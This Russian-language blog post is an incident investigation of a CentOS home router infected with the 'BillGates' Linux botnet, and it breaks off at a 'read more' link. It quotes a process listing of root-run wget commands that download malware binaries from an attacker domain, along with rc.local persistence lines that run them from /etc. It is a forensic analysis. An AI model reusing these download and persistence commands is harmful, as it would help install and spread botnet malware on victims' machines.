Исследуем Linux Botnet «BillGates»
Написал мне вчера lfatal1ty, говорит, домашний роутер на x86 с CentOS как-то странно себя ведет, грузит канал под гигабит, и какой-то странный процесс «atddd» загружает процессор. Решил я залезть и посмотреть, что же там творится, и сразу понял, что кто-то пробрался на сервер и совершает с ним непотребства всякие. В процессах висели wget-ы на домен dgnfd564sdf.com и процессы atddd, cupsdd, cupsddh, ksapdd, kysapdd, skysapdd и xfsdxd, запущенные из /etc: Скрытый текстroot 4741 0.0 0.0 41576 2264? S 21:00 0:00 wget http://www.dgnfd564sdf.com:8080/sksapd
root 4753 0.0 0.0 41576 2268? S 21:00 0:00 wget http://www.dgnfd564sdf.com:8080/xfsdx
root 4756 0.0 0.0 41576 2264? S 21:00 0:00 wget http://www.dgnfd564sdf.com:8080/cupsdd
root 4757 0.0 0.0 41576 2268? S 21:00 0:00 wget http://www.dgnfd564sdf.com:8080/kysapd
root 4760 0.0 0.0 41576 2264? S 21:00 0:00 wget http://www.dgnfd564sdf.com:8080/ksapd
root 4764 0.0 0.0 41576 2268? S 21:00 0:00 wget http://www.dgnfd564sdf.com:8080/atdd
root 4767 0.0 0.0 41576 2264? S 21:00 0:00 wget http://www.dgnfd564sdf.com:8080/skysapd
К сожалению, процессы не додумался скопироватьНачальный анализ
Сначала я полез смотреть, что же вообще происходит и насколько серьезно была скомпрометирована система. Первое, что мне пришло в голову проверить — /etc/rc.local. Там было следующее: cd /etc;./ksapdd
cd /etc;./kysapdd
cd /etc;./atddd
cd /etc;./ksapdd
cd /etc;./skysapdd
cd /etc;./xfsdxd
«Хмм, ладно», подумал я. Полез в root’овский crontab Читать дальше →
